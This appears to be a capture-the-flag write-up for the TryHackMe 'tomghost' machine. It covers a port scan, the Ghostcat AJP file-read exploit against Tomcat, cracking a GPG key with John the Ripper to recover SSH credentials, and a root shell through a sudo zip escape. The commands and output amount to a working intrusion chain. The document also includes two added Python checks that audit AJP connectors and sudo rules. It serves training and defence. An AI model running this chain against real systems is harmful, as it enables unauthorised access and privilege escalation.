Basic information
| 🚀 | Local machine | Target machine |
|---|---|---|
| IP | 10.17.5.121 | 10.10.211.222 |
| OS | Kali | Linux ubuntu |
Information gathering
Port scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 60
53/tcp open domain syn-ack ttl 60
8009/tcp open ajp13 syn-ack ttl 60
8080/tcp open http-proxy syn-ack ttl 60
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Raw packets sent: 8 (328B) | Rcvd: 5 (216B)
Further version detection
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped syn-ack ttl 60
8009/tcp open ajp13 syn-ack ttl 60 Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack ttl 60 Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Path enumeration
Exploitation
Search
apache jserv protocol v1.3 exploit

git clone https://github.com/leonooo13/CNVD-2020-10487-Tomcat-Ajp-lfi.git
└─$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py -h
usage: CNVD-2020-10487-Tomcat-Ajp-lfi.py [-h] [-p PORT] [-f FILE] target
positional arguments:
target Hostname or IP to attack
options:
-h, --help show this help message and exit
-p PORT, --port PORT AJP port to attack (default is 8009)
-f FILE, --file FILE file path :(WEB-INF/web.xml)
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.211.222
-----------------------------------
目标: 10.10.211.222 端口: 8009 文件:WEB-INF/web.xml
-----------------------------------
Getting resource at ajp13://10.10.211.222:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
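The web.xml above came back through the AJP connector on 8009, which Ghostcat (CNVD-2020-10487) abuses when the connector is reachable from the network and requires no shared secret. As an added example that is not part of the original writeup, this Python check parses a Tomcat server.xml and flags exactly that state; both sample configurations are constructed, and the attribute names follow the Tomcat AJP connector documentation (`address`, `secretRequired`, `secret`, and the older `requiredSecret`).

```python
import xml.etree.ElementTree as ET

# Constructed sample: an AJP connector as it appears in a pre-9.0.31 default
# server.xml, listening on every interface with no shared secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed sample: the same connector restricted to the loopback interface
# and gated by a shared secret that the reverse proxy must present.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443"/>
  </Service>
</Server>
"""

def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding string per risky attribute on every AJP connector."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        # Matches both the short form "AJP/1.3" and the full protocol class names.
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        # No address, or a wildcard address, leaves the AJP port reachable from the network.
        if address is None or address in ("0.0.0.0", "::"):
            findings.append(f"AJP connector on port {port} listens on all interfaces")
        # Without a secret, any client that can reach the port may speak AJP directly.
        secret = conn.get("secret") or conn.get("requiredSecret")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f"AJP connector on port {port} has secretRequired=false")
        elif not secret:
            findings.append(f"AJP connector on port {port} has no shared secret configured")
    return findings

if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or ["OK"])
```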
webshell
usershell
SSH login
skyfuck:8730281lkjlkjdqlksalks
skyfuck@ubuntu:~$ ls -la
total 40
drwxr-xr-x 3 skyfuck skyfuck 4096 Nov 16 00:44 .
drwxr-xr-x 4 root root 4096 Mar 10 2020 ..
-rw------- 1 skyfuck skyfuck 136 Mar 10 2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck 220 Mar 10 2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10 2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 Nov 16 00:44 .cache
-rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10 2020 credential.pgp
-rw-r--r-- 1 skyfuck skyfuck 655 Mar 10 2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10 2020 tryhackme.asc
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ gpg2john tryhackme.asc > hash.txt
File tryhackme.asc
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru (tryhackme)
1g 0:00:00:00 DONE (2024-11-16 03:55) 25.00g/s 26800p/s 26800c/s 26800C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Import the PGP key file, entering the password cracked above when prompted
└─$ gpg --import tryhackme.asc
gpg: 钥匙箱‘/home/kali/.gnupg/pubring.kbx’已创建
gpg: /home/kali/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 密钥 8F3DA3DEC6707170:公钥 “tryhackme <stuxnet@tryhackme.com>” 已导入
gpg: 密钥 8F3DA3DEC6707170:私钥已导入
gpg: 密钥 8F3DA3DEC6707170:“tryhackme <stuxnet@tryhackme.com>” 未改变
gpg: 处理的总数:2
gpg: 已导入:1
gpg: 未改变:1
gpg: 读取的私钥:1
gpg: 导入的私钥:1
Decrypt credential.pgp with gpg, entering the same password again when prompted
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ gpg credential.pgp
gpg: 警告:没有提供命令。正在尝试猜测您的意图...
gpg: 注意:接收者的偏好设置中找不到密文算法 CAST5
gpg: 由 1024 位的 ELG 密钥加密,标识为 61E104A66184FBCC,生成于 2020-03-11
“tryhackme <stuxnet@tryhackme.com>”
└─$ cat credential
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
┌──(kali㉿kali)-[~/Documents/thm/tomghost]
└─$ ssh merlin@10.10.211.222
merlin@10.10.211.222's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$ id
uid=1000(merlin) gid=1000(merlin) groups=1000(merlin),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
rootshell
GTFOBins privilege escalation

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
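The NOPASSWD zip rule above is the whole privilege-escalation path. As an added example that is not part of the original writeup, this Python check parses `sudo -l` output and flags rules that grant unrestricted access to a binary with a documented sudo shell escape; the sample output is constructed from the rule seen on the target plus two extra entries, and the binary set is a small assumed subset of GTFOBins to be extended by the reader.

```python
import re

# Constructed sample: the `sudo -l` output shape from the target, with an
# argument-restricted entry and a password-protected entry added for contrast.
SUDO_L_OUTPUT = r"""Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (root) /usr/bin/vim
"""

# Assumed subset of binaries whose GTFOBins entries document a sudo shell escape.
SHELL_ESCAPE_BINARIES = {"zip", "tar", "find", "vim", "less"}

# One sudoers rule line: "(runas) TAG: TAG: cmd1, cmd2 ..."
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_rules(sudo_l: str) -> list:
    """Return (runas, binary, nopasswd) for each unrestricted rule on a risky binary."""
    findings = []
    in_rules = False
    for line in sudo_l.splitlines():
        # Rules start after the "User ... may run the following commands" line.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        # A Cmnd_Spec may list several commands separated by commas.
        for cmd in m.group("cmds").split(","):
            parts = cmd.strip().split()
            if not parts:
                continue
            binary = parts[0].rsplit("/", 1)[-1]
            # Only an unrestricted invocation (no fixed arguments) is flagged.
            if binary in SHELL_ESCAPE_BINARIES and len(parts) == 1:
                findings.append((m.group("runas").strip(), binary, nopasswd))
    return findings

if __name__ == "__main__":
    for runas, binary, nopasswd in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"{binary} runnable as ({runas}), NOPASSWD={nopasswd}")
```

The NOPASSWD flag separates rules usable without any credential from those that still need the user's password, which matters when prioritising remediation.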
Trace cleanup
rm $TF